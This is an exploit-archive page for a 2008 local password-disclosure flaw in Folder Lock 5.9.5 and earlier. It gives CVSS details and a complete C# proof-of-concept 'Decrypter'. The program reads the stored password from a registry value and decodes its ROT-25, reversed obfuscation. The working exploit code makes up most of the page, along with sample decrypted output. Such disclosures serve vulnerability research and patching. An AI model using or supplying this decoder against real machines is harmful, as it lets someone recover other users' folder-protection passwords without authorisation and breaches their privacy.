Folder Lock <= 5.9.5 Local Password Information Disclosure

2008-08-20 / 2008-08-21
Risk: Low
Local: Yes
Remote: No
CWE: CWE-310


CVSS Base Score: 2.1/10
Impact Subscore: 2.9/10
Exploitability Subscore: 3.9/10
Exploit range: Local
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: None
Availability impact: None

/* * Folder Lock <= 5.9.5 Local Password Information Disclosure * * Author(s): Charalambous Glafkos * George Nicolaou * Date: June 19, 2008 * Site: http://www.astalavista.com * Mail: glafkos_at_astalavista&#46;com * ishtus_at_astalavista&#46;com * * Synopsis: Folder Lock 5.9.5 and older versions are prone to local information-disclosure vulnerability. * Successfully exploiting this issue allows attackers to obtain potentially sensitive information that may aid in further attacks. * The security issue is caused due to the application storing access credentials within the Windows registry key: * (HKEY_CURRENT_USER\Software\Microsoft\Windows\QualityControl) without proper encryption. * This can be exploited to disclose the encrypted _pack password of the user which is ROT-25 and reversed. * * Sample Output: * * ASTALAVISTA the hacking & security community * Folder Lock <= 5.9.5 Decrypter v2.0 * --------------------------------- * Encrypted Password: :3<k_^62`4T- * Decrypted Password: ,S3_15]^j;29 * */ using System; using System.Text; using System.IO; using System.Threading; using Microsoft.Win32; namespace getRegistryValue { class getValue { static void Main() { getValue details = new getValue(); Console.WriteLine("\nASTALAVISTA the hacking & security community\n\n"); Console.WriteLine("Folder Lock <= 5.9.5 Decrypter v2.0"); Console.WriteLine("---------------------------------"); String strFL = details.getFL(); Console.WriteLine(strFL); Thread.Sleep(5000); } private string getFL() { RegistryKey FLKey = Registry.CurrentUser; FLKey = FLKey.OpenSubKey(&#64;"Software\Microsoft\Windows\QualityControl", false); String _pack = FLKey.GetValue("_pack").ToString(); String strFL = "Encrypted Password: " + _pack.Replace("~", "") + "\nDecrypted Password: " + Reverse(Rotate(_pack.Replace("~", ""))) + "\n"; return strFL; } public string Reverse(string x) { char[] charArray = new char[x.Length]; int len = x.Length - 1; for (int i = 0; i <= len; i++) charArray[i] = x[len - i]; return new string(charArray); } public static string Rotate(string toRotate) { char[] charArray = toRotate.ToCharArray(); for (int i = 0; i < charArray.Length; i++) { int thisInt = (int)charArray[i]; if (thisInt >= 65 && thisInt <= 91) { thisInt += 25; if (thisInt >= 91) { thisInt -= 26; } } if (thisInt >= 92 && thisInt <= 96) { thisInt += 25; if (thisInt >= 96) { thisInt -= 26; } } if (thisInt >= 32 && thisInt <= 47) { thisInt += 25; if (thisInt >= 47) { thisInt -= 26; } } if (thisInt >= 48 && thisInt <= 57) { thisInt += 25; if (thisInt >= 57) { thisInt -= 26; } } if (thisInt >= 58 && thisInt <= 64) { thisInt += 25; if (thisInt >= 64) { thisInt -= 26; } } if (thisInt >= 97 && thisInt <= 123) { thisInt += 25; if (thisInt >= 123) { thisInt -= 26; } } charArray[i] = (char)thisInt; } return new string(charArray); } } } Best Regards, Charalambous Glafkos ( nowayout )

References:

http://www.securityfocus.com/bid/30771


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top